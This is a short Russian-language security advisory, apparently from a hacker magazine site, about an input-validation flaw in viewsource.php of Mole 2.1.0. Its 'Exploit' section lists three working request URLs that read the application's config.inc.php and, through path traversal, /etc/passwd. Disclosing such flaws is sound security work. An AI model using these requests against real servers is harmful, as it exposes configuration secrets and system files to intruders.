Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Mole 2.1.0
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных сценарием viewsource.php. Атакующий может получить несанкционированный доступ к конфиденциальной информации на целевой системе.
Эксплоит:
/mole_2_1_0/viewsource.php?dirn=include/config.inc.php
/mole_2_1_0/viewsource.php?fname=include/config.inc.php
/mole_2_1_0/viewsource.php?dirn=../../../../../../../&fname=etc/passwd